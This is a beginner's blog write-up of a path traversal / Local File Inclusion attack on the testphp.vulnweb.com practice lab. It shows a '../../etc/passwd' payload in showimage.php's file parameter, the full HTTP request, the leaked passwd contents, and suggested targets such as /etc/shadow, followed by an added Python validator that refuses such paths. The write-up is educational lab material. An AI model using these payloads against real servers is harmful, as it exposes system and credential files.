Identifying Local File Inclusion (LFI) on http://testphp.vulnweb.com/

UJJWAL GAUTAM
3 min read · Jul 7, 2021

Hello guys,

This writeup might be helpful for beginners who want to practice and learn about LFI on the http://testphp.vulnweb.com/ lab.

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. (Source: https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/)

Simply,

LFI = Path Traversal/Directory Traversal + Code Execution

Now, let's begin.

1. Go to http://testphp.vulnweb.com/

2. Capture the request in Burp Suite by reloading the page, or pick it from the HTTP history tab (Burp version 1.7).

3. Send the request to Repeater and click “spider from here”. Add the target to scope. Then click Burp in the top left > Search.

4. Search for “file=” and hit GO.

5. Select one request containing the “file” parameter and send it to Repeater.

You can see the value of the file parameter as: file=./pictures/4.jpg

An attacker can get the contents of the /etc/passwd file, which contains the list of users on the server. So let's replace the value with /etc/passwd

OK, we got a warning in the response. Now let's try ../etc/passwd. You can observe another warning in the response.

Now let's try ../../etc/passwd. Boom!

The response is:

HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Wed, 07 Jul 2021 06:11:53 GMT
Content-Type: image/jpeg
Connection: close
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Length: 845

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:1002:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

Our request is:

GET /showimage.php?file=../../etc/passwd HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1
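What makes ../../etc/passwd work above is that showimage.php joins the raw file parameter onto a path and serves whatever it lands on. The following is an added example, not the lab's code, of how a defender would handle that parameter: decode the value, refuse NUL bytes and absolute paths, allow only image extensions and, most importantly, resolve the real path and check that it stays under the image directory. The directory layout it builds under a temp directory is constructed for the demonstration.

```python
import os
import posixpath
import tempfile
from typing import Dict, Optional
from urllib.parse import unquote

# Image types showimage.php is meant to serve; anything else (e.g. /etc/passwd) is refused.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image(base_dir: str, file_param: str) -> Optional[str]:
    """Return the real path of the requested image, or None if the request must be refused."""
    # Decode a few times so %2e%2e%2f and double-encoded variants are judged in decoded form.
    decoded = file_param
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    # NUL bytes (old PHP truncated paths at \0), absolute paths and backslashes are refused outright.
    if "\x00" in decoded or decoded.startswith("/") or "\\" in decoded:
        return None
    if posixpath.splitext(decoded)[1].lower() not in ALLOWED_EXT:
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    # Containment check with a trailing separator so "images2" cannot pass for "images".
    if not candidate.startswith(base_real + os.sep):
        return None
    return candidate if os.path.isfile(candidate) else None


def demo() -> Dict[str, bool]:
    """Constructed layout: <tmp>/www/images/pictures/4.jpg inside, <tmp>/etc/passwd outside."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "www", "images")
    os.makedirs(os.path.join(base, "pictures"))
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(base, "pictures", "4.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # constructed JPEG header bytes
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
    # The lab's legitimate value, the probes from the writeup, encoded variants, and one
    # traversal that lands back inside the image directory (allowed: containment, not "..", decides).
    probes = ["./pictures/4.jpg", "/etc/passwd", "../etc/passwd", "../../etc/passwd",
              "..%2F..%2Fetc%2Fpasswd.jpg", "%2e%2e/%2e%2e/etc/passwd.jpg",
              "../../etc/passwd%00.jpg", "../../www/images/pictures/4.jpg"]
    return {p: resolve_image(base, p) is not None for p in probes}
```

Running demo() returns True only for the two values that resolve inside the image directory; every /etc/passwd variant, encoded or not, is refused.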

Similar parameter values are:

/etc/shadow

/var/logs

[Image: Red Team Field Manual]

Contact

If you want to connect on Facebook → UJJWAL GAUTAM :)
